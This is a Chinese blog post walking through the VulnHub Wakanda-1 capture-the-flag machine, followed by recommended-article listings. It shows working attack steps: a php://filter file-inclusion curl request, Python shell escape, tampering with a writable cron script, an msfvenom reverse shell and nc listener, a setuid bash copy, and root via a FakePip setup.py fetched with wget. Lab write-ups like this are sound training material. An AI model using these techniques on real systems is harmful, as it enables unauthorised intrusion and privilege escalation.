VulnHub_WaKanda_1

最新推荐文章于 2024-10-11 20:52:27 发布
最新推荐文章于 2024-10-11 20:52:27 发布
阅读量214 收藏 1
点赞数
文章标签: nginx linux 安全 https 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/107603048
版权


发现目标主机

使用nmap扫描网段,找到目标主机

nmap 192.168.1.0/24

扫描目标主机开放端口

使用nmap探测目标主机开放的端口

sudo nmap -A 192.168.1.7

访问80端口网站

网页中没有任何有价值的信息
查看源代码,发现有一行注释,我们在浏览器试试

打开发现这应该是一个德语的首页

然后,尝试访问以下组合

http://192.168.1.7/?lang=fr


http://192.168.1.7/fr.php


http://192.168.1.7/?lang=index


http://192.168.1.7/index.php


怀疑这个地方可能存在文件包含漏洞,我们使用PHP中的Filter协议来读取文件

sudo curl http://192.168.1.7/?lang=php://filter/read=convert.base64-encode/resource=index


可以读取到index.php的内容,但是发现头部是被加密的
使用base64进行解密

sudo curl http://192.168.1.7/?lang=php://filter/read=convert.base64-encode/resource=index | head -n 1 | base64 -d


通过解密后的结果我们得到一个密码

$password ="Niamey4Ever227!!!" ;//I have to remember it

在网页中有网站作者的提示'Made By@mamadou',nmap探测结果中我们知道SSH端口是3333,,现在我们使用ssh去连接目标主机

ssh mamadou@192.168.1.7 -p 3333


登录之后发现这是一个Python2.7的命令行环境
首先导入pty包,然后获取一个交互式Shell

import pty;
pty.spawn('/bin/bash');


查看文件得到第一个flag

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc


查看devops的家目录下存在flag2,但是没有权限读取

查找属于devops用户的文件,看看有没有可以利用的

find / -user devops 2>/dev/null


发现srv目录下存在一个py文件

查看文件只有一个在/tmp/下创建test文件的功能

但是发现这个文件可以被任意用户修改,我们写入查看flag的代码

with open('/home/devops/flag2.txt','r') as f:
    open('/tmp/flag2.txt','w').write(f.read())


查看/tmp/flag2.txt得到flag2

cat /tmp/flag2.txt


使用msfvenom生成python的反弹shell

sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.1.11 lport=4444 R


在攻击机中使用nc进行监听4444端口

sudo nc -lvp 4444


在.antivirus.py中写入生成的代码

执行py文件

将py文件修改为以下内容

import os
os.system("cp /bin/bash /tmp/dbash")
os.system("chmod 6775 /tmp/dbash")

5分钟后生成了dbash

查看Flag2

现在我们需要一个devops的shell,我们继续修改py文件的代码

kali上监听3344端口

大约5分钟后返回一个shell

查看用户权限为devops

查看发现pip可以以root权限执行

查阅发现《sudo pip install privesc》这篇文章可以使用pip进行提权
https://www.root4loot.com/post/pip-install-privilege-escalation/
下载setup.py文件到本地

git clone https://github.com/0x00-0x00/FakePip.git


本地使用python搭建HTTP服务,在目标机器上下载setup.py

sudo python -m SimpleHTTPServer 3322


在目标机器上下载文件

wget http://192.168.1.11:3322/setup.py


根据setup.py中的代码,我们继续监听13372端口

sudo nc -lvp 13372


执行下面的命令

sudo pip install --upgrade --force-reinstall


查看监听端口,返回一个shell

查看权限是root权限

进入root目录查看flag

最终得到最后一个Flag

821ae63dbe0c573eff8b69d451fb21bc

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1096
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
Wakanda: 1靶场复现【附代码】(权限提升)
weixin_52487093的博客
08-10 644
Wakanda: 1靶场复现【附代码】(权限提升)
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2302
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
Vulnhub靶机Wakanda渗透测试攻略
10-15 3910
前言 Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。 百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导...
wakanda-widgets:自定义小部件集成到 Wakanda 框架和 Wakanda GUI 设计器中
06-01
Wakanda-widgets 在此存储库中,您可以与社区共享您的自定义 Wakanda 小部件。 如何为创建自定义小部件 有关创建自定义小部件的信息,请参阅文档。 如何请求将您的小部件添加到此列表中 要将小部件的存储库添加到...
wakanda-node:Wakanda数据库的简单节点连接器
04-29
Wakanda针对NodeJS的连接 快速入门示例: 安装依赖项 npm i -S midrissi/wakanda-node 初始化连接器 初始化程序返回一个Promise(有关更多信息,请参阅 ) var wakanda = require ( 'wakanda-node' ) ; var promise...
ionic-starter-wakanda:Ionic Wakanda 的空白启动项目
07-17
它缺少 Ionic 库和 Angular-Wakanda。 要使用它,请使用 ionic node.js 实用程序创建一个新的 ionic 项目,或者将其复制并粘贴到现有的 Cordova 项目中,然后单独下载 Ionic 的发行版。 先决条件 当然你需要节点,...
todo-wakanda:用wakanda创建的一个简单的待办事项应用
04-28
wakanda创建的一个简单的待办事项应用 可以从以下获得演示: : 本地运行 确保已安装 ,然后运行以下命令: $ git clone https://github.com/midrissi/todo-wakanda.git $ cd todo-wakanda $ npm i 然后用...
angular-wakanda-upload
05-22
1. **设置文件输入元素** 在HTML模板中,我们需要添加一个`<input type="file">`元素,用户可以通过它选择要上传的文件。通常还会添加一个按钮触发上传操作。 2. **监听文件改变事件** 使用AngularJS的`ngChange`...
【甄选靶场】Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)
人间体佐菲的博客
09-24 863
Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)信息安全,网络安全,渗透测试
靶机wakanda_1练习报告
黑战士的博客
05-21 559
1.熟练使用多种提权方法。
带妹玩转Vulnhub【七】
BadRer的博客
10-01 1353
前言 国庆第一天,不太想撩妹,再写点东西,增加点产量,严肃脸
vulnhub:DeRPnStiNK
墨染的博客
10-09 1750
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
最新发布
qq_45732829的博客
10-11 924
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
Linux和数据库)1.Linux操作系统和常用命令
2301_79144798的博客
10-09 774
除了办公和玩游戏之外不用Linux,其他地方都要使用Linux(it相关)iOS的本质是unix(unix是付费版本的操作系统)unix和Linux之间很相似命令 选项 参数由这三部分组成 可以只有命令目录就是文件夹。
Linux 内核清理缓存命令
luoye_369的博客
10-11 281
一、问题描述log:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值